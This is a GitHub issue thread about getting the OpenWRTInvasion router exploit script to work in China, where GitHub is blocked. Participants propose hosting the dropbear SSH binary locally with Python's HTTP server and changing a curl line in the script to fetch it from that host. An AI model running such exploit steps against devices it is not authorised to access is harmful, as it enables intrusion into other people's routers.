acecilia/OpenWRTInvasion #62: Improve the success rate of using the script in China

OPPO9008, 2021-01-17:
everyone know github Blocked in china 。 so [this](https://github.com/acecilia/OpenWRTInvasion/blob/2851dc73538d32c477e3ef8f049084a24218f0ca/script.sh#L27)  not good。
 i think shout
 python -m SimpleHTTPServer

change [this](https://github.com/acecilia/OpenWRTInvasion/blob/2851dc73538d32c477e3ef8f049084a24218f0ca/script.sh#L27)  to 
curl -L http://my_ip:8000/script_tools/dropbearStaticMipsel.tar.bz2 --output dropbear.tar.bz2

LiarOnce, 2021-01-17:
It works, and need to modify two lines of code.
```python
#Python 2
python -m SimpleHTTPServer 8080

#Python 3
python3 -m http.server 8080
```

The URL is the IP address of the device you're using, not the IP address of the router.

acecilia, 2021-01-17:
How are you opening this GitHub issue if GitHub is blocked in China? 🤔 

Thanks @LiarOnce for the solution. 

@OPPO9008 use a VPN then 🙂 Hosting the binaries somewhere else doesn’t make sense because this exploit is itself hosted in GitHub: if you can download the exploit, you can also download the binaries

closed 2021-01-17 by acecilia